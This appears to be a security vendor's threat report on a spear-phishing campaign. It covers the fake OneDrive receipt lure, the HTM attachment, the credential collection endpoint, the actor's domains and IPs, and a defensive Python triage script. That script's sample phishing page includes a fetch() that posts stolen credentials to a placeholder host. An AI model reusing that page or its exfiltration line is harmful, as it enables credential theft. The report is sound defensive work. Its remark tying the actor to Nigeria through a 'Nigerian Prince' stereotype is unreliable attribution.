
[Featured image: targeted-spear-phishing_image-feature]

The GoSecure Titan Inbox Detection and Response (IDR) team recently discovered yet another targeted spear-phishing campaign. The campaign targeted over 150 organizations encompassing a varying array of industries from Financial, Automotive, Technology, and Defense Contractors.

The samples utilize many common Business Email Compromise traits. The From is masked to look like it is coming from within the company, there is an attachment of a “receipt”, and the Subject denoting that a file is being received. The bad actor went further and attempted to mask it as a Microsoft Office 365 automated email by putting in the Body of the message “Sent Via Microsoft OneDrive”.

[Figure: targeted-spear-phishing_image-1]

When the attachment is opened, it launches the browser and shows a “Secured Document” page prompting the user to log in to view the file. The page looks similar to those of many digital signature sites.

[Figure: targeted-spear-phishing_image-2]

Here is where it gets interesting. Investigating further, we find that the targeted user’s email address and company name are hardcoded into the HTM file. This hardcoding indicates that each attack was uniquely generated to target specific users within their respective organizations.

Further analysis showed that the credentials entered would be sent to hxxps://tradershost[.]com/REDACTED/send.php:

[Figure: targeted-spear-phishing_image-3]

When visiting this page, the browser displays a JSON reply of {"msg":"empty"}, which indicates this phishing kit has its own API. Removing send.php from the URL returns a directory index that lists other pages in the kit. This novice or possibly lazy move of not turning off the directory index display helped in the investigation. One of the pages hosted was marked “admin@paperfoxla.com.txt”. This file appears to be the ‘database’ file of all the usernames and passwords collected so far by this campaign.
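To make the attachment traits described above concrete, here is an added triage check (not GoSecure's code) that inspects an HTM attachment for a recipient address hardcoded into the page, the “Secured Document” / “Sent Via Microsoft OneDrive” lure text, and a credential submission endpoint (a form action or *.php URL) on a host outside the recipient's organization. The sample page, the domain phish-kit.invalid and the mailbox jane.doe@example-corp.test are constructed placeholders.

```python
# Added example (not GoSecure's code): triage one HTM phishing attachment for the
# traits the post describes: hardcoded recipient, lure text, and an off-site
# credential submission endpoint (form action or *.php URL).
import re
from urllib.parse import urlparse

LURE_PHRASES = ("secured document", "sent via microsoft onedrive")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
ACTION_RE = re.compile(r"""action=["']([^"']+)""", re.I)
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def triage_htm(html, recipient):
    """Return the indicators found in one HTM attachment body.

    recipient is the mailbox the message was delivered to; a page that embeds
    that exact address was generated for this target rather than sent in bulk.
    """
    lower = html.lower()
    recipient_domain = recipient.rsplit("@", 1)[-1].lower()
    embedded = {m.lower() for m in EMAIL_RE.findall(html)}
    actions = set(ACTION_RE.findall(html))
    submit_targets = []
    for url in URL_RE.findall(html):
        host = (urlparse(url).hostname or "").lower()
        same_org = host == recipient_domain or host.endswith("." + recipient_domain)
        endpoint = url in actions or urlparse(url).path.lower().endswith(".php")
        if host and not same_org and endpoint:
            submit_targets.append(url)
    report = {
        "hardcoded_recipient": recipient.lower() in embedded,
        "lure_phrases": [p for p in LURE_PHRASES if p in lower],
        "submit_targets": submit_targets,
    }
    # A page built for one named recipient that ships credentials off-site is the
    # pattern in the post; lure text alone is only supporting evidence.
    report["suspicious"] = report["hardcoded_recipient"] and bool(submit_targets)
    return report


# Constructed sample attachment (placeholder domains, not from the campaign).
SAMPLE_HTM = """<html><body><h2>Secured Document</h2>
<p>Sent Via Microsoft OneDrive</p>
<form id="f"><input name="email" value="jane.doe@example-corp.test" readonly>
<input name="password" type="password"><button>View file</button></form>
<script>document.getElementById("f").onsubmit = function (e) { e.preventDefault();
  fetch("https://phish-kit.invalid/kit/send.php", {method: "POST", body: new FormData(this)}); };
</script></body></html>"""
```

Run against a real attachment, the `submit_targets` list is the value to pivot on: it is the kit's collection endpoint, which in this campaign also exposed a directory index.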

GoSecure Titan IDR analyst investigation discovered that the Tradershost[.]com website is hosted on an Apache server and appeared to be used solely for malicious activity. The content of the website was a PHP web application masked to look like a stock trading company.

[Figure: targeted-spear-phishing_image-4]

[Figure: targeted-spear-phishing_image-5]

Through all our research, one thing in particular stood out. In the credential files was a name claiming credit for the spear phishing:

– by *DH4 VIP3R L337 –

Searching for that name on Google revealed multiple websites which contained the same string. One such website was “viperserver11[.]xyz” and included copies of the same phishing kit. These copies, however, appeared to be the bad actor’s own tests of the phishing kit.

GoSecure Titan IDR analysts discovered another website, “uswidefiinancial[.]com”, which appeared to be another hosted phishing campaign.

[Figure: targeted-spear-phishing_image-6]

Our investigation identified one possible slip-up by the bad actor. Across the bad actor’s test submissions, the same IP addresses showed up. The first IP address, 45.41.180.81, was used by a consumer VPN provider. However (and noted in the above picture), a second address was found. That address, 105.161.23.111, was owned by Safaricom Limited, an ISP in Nairobi, Kenya.

Wrapping up our investigation, we found a YouTube channel under the bad actor’s name. While activity was limited to a single upload from 2016, it is a video from the country we all know when it comes to spam and phishing, Nigeria. Just maybe our Nigerian Prince friend finally ran out of money and changed his occupation.

Using Privacy as a Shield

The bad actor used products and services commonly used to host websites, email, and e-commerce safely, securely, and privately. For example, many hosting companies, including NameCheap, offer a service that keeps the WHOIS record of a domain private. For most customers, this keeps small companies and individuals from being bombarded with emails and phone calls offering to build them the most amazing website or pushing services they do not necessarily need. In the hands of a bad actor, however, it masks the very information that could help track them down.

All three domains, “viperserver11[.]xyz”, “tradershost[.]com”, and “uswidefiinancial[.]com”, were masked behind these services to make it harder to gather information. “viperserver11[.]xyz” was utilizing Cloudflare, so the IP address of the server running the site could not be easily discovered. The other two were registered and hosted with NameCheap, a registrar with a very strict privacy policy.

Final Thought

The organizations targeted by the campaign come in all sizes, including some very well-known Fortune 500 and Government organizations. It’s comforting to believe that, given their size and cybersecurity budgets, some of these organizations are protected from such attacks. As this campaign illustrates, cybercriminals continue to find ways to bypass traditional email gateway solutions, leaving imperfect humans as the organization’s final line of defense. By the time GoSecure Titan IDR analysts discovered the primary server behind this attack, the cybercriminals had already collected 211 unique usernames and passwords from 159 different organizations. Imperfect humans indeed.
